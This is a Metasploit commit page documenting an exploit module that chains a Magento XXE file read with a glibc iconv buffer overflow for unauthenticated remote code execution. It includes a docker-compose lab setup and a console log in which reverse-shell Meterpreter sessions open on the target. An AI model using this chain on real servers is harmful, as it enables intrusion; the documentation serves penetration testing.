Magento XXE to GLIBC buffer overflow

jheysel-r7 · Oct 9, 2024 · 9536eaa · 9536eaa
1 parent 76d55c9
commit 9536eaa
Show file tree

Hide file tree

Showing 3 changed files with 784 additions and 0 deletions.
diff --git a/documentation/modules/exploit/linux/http/magento_xxe_to_glibc_buf_overflow.md b/documentation/modules/exploit/linux/http/magento_xxe_to_glibc_buf_overflow.md
@@ -0,0 +1,154 @@
+## Vulnerable Application
+This combination of an Arbitrary File Read (CVE-2024-34102) and a Buffer Overflow in glibc (CVE-2024-2961)
+allows for unauthenticated Remote Code Execution on the following versions of Magento and Adobe Commerce and
+earlier if the PHP and glibc versions are also vulnerable:
+  - 2.4.7 and earlier
+  - 2.4.6-p5 and earlier
+  - 2.4.5-p7 and earlier
+  - 2.4.4-p8 and earlier
+
+Vulenerable PHP versions:
+  - From PHP 7.0.0 (2015) to 8.3.7 (2024)
+
+Vulnerable iconv() function in the GNU C Library:
+  - 2.39 and earlier
+
+The exploit chain is quite interesting and for more detailed information I suggest reading the links in the
+references. I'll give a very brief over view. CVE-2024-34102 is and XML External Entity vulnerability which
+leverages PHP filters to read arbitrary files off the target system. The exploit chain uses this to read
+/proc/self/maps off the system which provides the address of PHP's heap and the filename of the libc. Then
+using the file read again the libc binary is downloaded and the exploit extracts the address and offset of the
+following functions which are used to write the payload: libc_malloc, libc_system and libc_realloc.
+
+With this information and expert knowledge of PHP, it's: chunks, free lists, buckets, bucket brigades and how
+all such things are are stored in memory and affected by PHP filters, CVE-2024-2961 can then be exploited. A
+long chain of PHP filters is constructed and sent in the same way the XXE is exploited which allows for; a
+payload to be written to memory and for the buffer overflow to be exploited in order to redirect execution to
+obtain RCE.
+
+### Setup
+
+The following docker-compose file can be used to test this module. There are a few things that need to be noted:
+1. cURL is not installed by default in the target container, in order for a fetch payload to be successful run the
+   following once the container has been started:
+```
+   docker exec -it magento_magento_1 bash 
+   root@13c538f53068:/# apt update; apt install curl -y
+```
+2. The docker-compose file sets magento server's name to `localhost` and in order to exploit the container `rhost` must
+   be set to `localhost` (setting `rhost` to `127.0.0.1` or your local IP address will not work for this docker-compose file)
+   and so given this configuration `msfconsole` must be running on the same host as the container.
+3. The network settings on my macbook didn't allow me to exploit this locally so I was running the containers and
+   `msfconsole` from an Ubuntu 22.04 VM.
+
+```
+services:
+  mariadb:
+    image: docker.io/bitnami/mariadb:10.6
+    environment:
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+      - MARIADB_USER=bn_magento
+      - MARIADB_DATABASE=bitnami_magento
+    volumes:
+      - 'old_mariadb_data:/bitnami/mariadb'
+  magento:
+    image: docker.io/bitnami/magento:2.4.7-debian-12-r0
+    ports:
+      - '80:8080'
+      - '443:8443'
+    environment:
+      - MAGENTO_HOST=localhost
+      - MAGENTO_DATABASE_HOST=mariadb
+      - MAGENTO_DATABASE_PORT_NUMBER=3306
+      - MAGENTO_DATABASE_USER=bn_magento
+      - MAGENTO_DATABASE_NAME=bitnami_magento
+      - ELASTICSEARCH_HOST=elasticsearch
+      - ELASTICSEARCH_PORT_NUMBER=9200
+      # ALLOW_EMPTY_PASSWORD is recommended only for development.
+      - ALLOW_EMPTY_PASSWORD=yes
+    volumes:
+      - 'old_magento_data:/bitnami/magento'
+    depends_on:
+      - mariadb
+      - elasticsearch
+  elasticsearch:
+    image: docker.io/bitnami/elasticsearch:7
+    volumes:
+      - 'old_elasticsearch_data:/bitnami/elasticsearch/data'
+volumes:
+  old_mariadb_data:
+    driver: local
+  old_magento_data:
+    driver: local
+  old_elasticsearch_data:
+    driver: local
+```
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use `
+1. Set the `RHOST`, `SRVHOST` and `LHOST` options
+1. Run the module
+1. Receive 3 Meterpreter sessions as the `daemon` user.
+
+## Scenarios
+### 
+```
+msf6 > use magento_xxe_to_glibc_buf_overflow
+
+Matching Modules
+================
+
+   #  Name                                                  Disclosure Date  Rank       Check  Description
+   -  ----                                                  ---------------  ----       -----  -----------
+   0  exploit/linux/http/magento_xxe_to_glibc_buf_overflow  1970-01-01       excellent  No     CosmicSting: Magento Arbitrary File Read (CVE-2024-34102) + PHP Buffer Overflow in the iconv() function of glibc (CVE-2024-2961)
+
+
+Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/magento_xxe_to_glibc_buf_overflow
+
+[*] Using exploit/linux/http/magento_xxe_to_glibc_buf_overflow
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > set srvhost 172.16.199.130
+srvhost => 172.16.199.130
+msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > set fetch_srvhost 172.16.199.130
+fetch_srvhost => 172.16.199.130
+msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > set rhost localhost
+rhost => localhost
+msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > run 
+[*] Exploit running as background job 6.
+
+[*] Started reverse TCP handler on 172.16.199.130:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Using URL: http://172.16.199.130:8080/
+[*] Server started
+msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > 
+[+] Exploit precondition 1/3 met: Detected Magento Community edition version 2.4 which is vulnerable.
+[+] Exploit precondition 2/3 met: PHP appears to be exploitable.
+[+] Exploit precondition 3/3 met: glibc is version: 2.36
+[+] The target appears to be vulnerable.
+[*] Attempting to parse libc to extract necessary symbols and addresses
+[*] Attempting to build an exploit PHP filter path with the information extracted from libc and /proc/self/maps
+[*] Sending payload...
+[*] Sending stage (3045380 bytes) to 172.25.0.4
+[*] Sending stage (3045380 bytes) to 172.25.0.4
+[*] Sending stage (3045380 bytes) to 172.25.0.4
+[*] Meterpreter session 4 opened (172.16.199.130:4444 -> 172.25.0.4:41354) at 2024-10-09 11:26:31 -0700
+[*] Meterpreter session 5 opened (172.16.199.130:4444 -> 172.25.0.4:41366) at 2024-10-09 11:26:31 -0700
+[*] Meterpreter session 6 opened (172.16.199.130:4444 -> 172.25.0.4:41370) at 2024-10-09 11:26:31 -0700
+[*] Server stopped.
+
+msf6 exploit(linux/http/magento_xxe_to_glibc_buf_overflow) > sessions -i -1
+[*] Starting interaction with 6...
+
+meterpreter > getuid
+Server username: daemon
+meterpreter > sysinfo
+Computer     : 172.25.0.4
+OS           : Debian 12.5 (Linux 6.8.0-45-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
@@ -251,6 +251,9 @@ Gem::Specification.new do |spec|
   # Needed for multiline REPL support for interactive SQL sessions
   spec.add_runtime_dependency 'reline'
 
+  # Needed to parse sections of ELF files in order to retrieve symbols
+  spec.add_runtime_dependency 'elftools'
+
   # Standard libraries: https://www.ruby-lang.org/en/news/2023/12/25/ruby-3-3-0-released/
   %w[
     abbrev